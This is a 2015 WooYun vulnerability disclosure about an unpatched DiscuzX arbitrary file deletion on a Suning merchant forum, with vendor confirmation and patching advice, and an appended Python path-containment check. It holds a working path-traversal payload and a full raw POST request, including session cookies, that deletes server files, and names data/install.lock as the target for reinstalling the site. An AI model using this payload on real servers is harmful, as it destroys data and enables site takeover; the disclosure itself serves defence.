
Vulnerability summary

Defect ID: wooyun-2015-0118763

Vulnerability title: A Suning site with unapplied patches allows arbitrary file deletion (the whole site can be reinstalled)

Vendor: 江苏苏宁易购电子商务有限公司

Author: 我是小号

Submitted: 2015-06-08 14:21

Fixed: 2015-07-23 15:18

Published: 2015-07-23 15:18

Vulnerability type: design flaw / logic error

Severity: High

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-06-08: Details reported to the vendor, awaiting vendor handling
2015-06-08: Vendor confirmed; details visible to the vendor only
2015-06-18: Details disclosed to core white hats and relevant domain experts
2015-06-28: Details disclosed to regular white hats
2015-07-08: Details disclosed to intern white hats
2015-07-23: Details disclosed to the public

Brief description:

A Suning site with unapplied patches allows arbitrary file deletion or reinstallation of the whole site

Details:

The underlying issue is the DiscuzX arbitrary file deletion vulnerability, described here:

WooYun: DiscuzX arbitrary file operation vulnerability


————————————————————————————————
A search showed that suning.com hosts a Suning cloud-platform merchant community built on Discuz X2:
http://sopbbs.suning.com
The site evidently had not been patched in time, so an attacker could use the vulnerability above to delete the community's entire site data; deleting data/install.lock makes the whole site reinstallable.
————————————————————————————————
1. First, set the "Shop" field of the personal profile to:

../../../robots.txt


(screenshot: 000.png)


2. Submit the following delete request:

POST http://sopbbs.suning.com/home.php?mod=spacecp&ac=profile&op=base&deletefile%5Bfield1%5D=aaaaaa HTTP/1.1
Host: sopbbs.suning.com
Connection: keep-alive
Content-Length: 573
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://sopbbs.suning.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryknrVEN8vpBotf7fQ
Referer: http://sopbbs.suning.com/home.php?mod=spacecp&ac=profile&op=base
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: SN_CITY=100_025_1000173_9173_01_11365_2_0; cityId=9173; districtId=11365; pgv_pvi=850721792; sesabv=25%2350%3A50; sesab=b; __utma=1.1541753785.1433562056.1433570865.1433570865.1; __utmz=1.1433570865.1.1.utmcsr=baoxian.suning.com|utmccn=(referral)|utmcmd=referral|utmcct=/ins/index.htm; snbar=6; Hm_lvt_cb12e33a15345914e449a2ed82a2a216=1433566737,1433571713; cart_abtest_num=40; WC_PERSISTENT=dXCW0gvx2YYP5vAQuBEx5MbKWQs%3d%0a%3b2015%2d06%2d06+14%3a59%3a34%2e197%5f1433564897472%2d8159128%5f10052; smhst=123214772a101991647a127612134a127680293a125536310a126683612a125381002a123192521; _snAdId=14335796304256354; _snsr=www.suning.cn%7Creferral%7C%7C%7C; WC_SERVER=6; __wmv=1417928826.11; _customId=sgddccdd0561; _device_session_id=p_db790f4a-b22d-40c3-9293-c5a5e371b3a6; _snma=1%7C143356205591382429%7C1433562055913%7C1433643437899%7C1433643438272%7C531%7C20; _snmc=1; _snmp=143364343826996523; _snmb=143364324295187888%7C1433643438318%7C1433643438274%7C8; _ga=GA1.2.1541753785.1433562056; tjpctrl=1433645244153; R2RI_8947_saltkey=t688f3qk; R2RI_8947_lastvisit=1433639857; idsLoginUserIdLastTime=coolboyiswo%40sina.com; custno=6107252461; authId=si3FA0E734026E04CF8C6960AA99715AF9; R2RI_8947_auth=4361q0oGRfnSIlHiVWfEgLK5qRaHjRJntAhGvfANrmHIfJplPwaWph%2Brn20CrfNslyIA9LlsfVlsI3JW5GywEyIn; R2RI_8947_ulastactivity=8701l7buSJ15Q2JG8qw2V4lZl6RjcyjKjIBPHpyFmrQhKAUDvltE; R2RI_8947_nofavfid=1; R2RI_8947_forum_lastvisit=D_43_1433643504; R2RI_8947_visitedfid=43; R2RI_8947_smile=3D1; R2RI_8947_home_diymode=1; R2RI_8947_sendmail=1; R2RI_8947_checkpm=1; R2RI_8947_onlineusernum=24; R2RI_8947_lastact=1433644511%09forum.php%09forumdisplay; R2RI_8947_sid=EckIe1; SOP_USERACTIVITY_null=null
------WebKitFormBoundaryknrVEN8vpBotf7fQ
Content-Disposition: form-data; name="formhash"
14da2d9a
------WebKitFormBoundaryknrVEN8vpBotf7fQ
Content-Disposition: form-data; name="field1"
../../../robots.txt
------WebKitFormBoundaryknrVEN8vpBotf7fQ
Content-Disposition: form-data; name="privacy[field1]"
0
------WebKitFormBoundaryknrVEN8vpBotf7fQ
Content-Disposition: form-data; name="profilesubmit"
true
------WebKitFormBoundaryknrVEN8vpBotf7fQ
Content-Disposition: form-data; name="profilesubmitbtn"
true
------WebKitFormBoundaryknrVEN8vpBotf7fQ--


Then check:

http://sopbbs.suning.com/robots.txt


The file no longer exists.

Proof of vulnerability:

1. The robots.txt that was deleted:

(screenshot: 001.png)


2. After the delete request was sent, robots.txt was successfully deleted:

(screenshot: 002.png)


Exploitation only requires sending the same request with data/install.lock as the target; once that file is deleted, the whole community can be reinstalled.

Fix:

Apply the DiscuzX upgrade patches promptly.
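As an added illustration of the check such a patch has to enforce (example code written for this page, not Discuz's own code or its actual patch), the following resolves a user-supplied profile value against the upload directory and refuses to delete anything that escapes it. The site layout is constructed in a temporary directory, and data/attachment/profile is assumed as the upload directory.

```python
import os
import shutil
import tempfile
from typing import Dict, Optional


def resolve_inside(base_dir: str, user_value: str) -> Optional[str]:
    """Canonicalise base_dir/user_value and return it only if it stays inside base_dir.

    realpath() collapses '..' segments and follows symlinks, so a containment check
    on the canonical result covers both traversal and symlink escapes.
    """
    if not user_value or "\x00" in user_value or os.path.isabs(user_value):
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_value))
    if target == base or os.path.commonpath([base, target]) != base:
        return None
    return target


def delete_profile_file(base_dir: str, user_value: str) -> bool:
    """Delete a user-referenced file only when it resolves inside base_dir."""
    target = resolve_inside(base_dir, user_value)
    if target is None or not os.path.isfile(target):
        return False
    os.unlink(target)
    return True


def demo() -> Dict[str, bool]:
    """Run the check against a constructed site layout (assumed Discuz-like paths)."""
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, "data", "attachment", "profile")  # assumed upload dir
    os.makedirs(uploads)
    for rel in ("robots.txt", os.path.join("data", "install.lock"),
                os.path.join("data", "attachment", "profile", "avatar.png")):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("constructed sample\n")
    try:
        return {
            # legitimate value: a plain file name inside the upload directory
            "avatar_deleted": delete_profile_file(uploads, "avatar.png"),
            # the value from the report, which points at the site root
            "robots_deleted": delete_profile_file(uploads, "../../../robots.txt"),
            # the install.lock deletion the report warns about
            "lock_deleted": delete_profile_file(uploads, "../../install.lock"),
            "robots_survives": os.path.isfile(os.path.join(root, "robots.txt")),
            "lock_survives": os.path.isfile(os.path.join(root, "data", "install.lock")),
        }
    finally:
        shutil.rmtree(root)
```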

Copyright notice: when reposting, please credit 我是小号@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-06-08 15:17

Vendor reply:

Thank you for the submission; a 500 gift card will be sent shortly.

Latest status:

None yet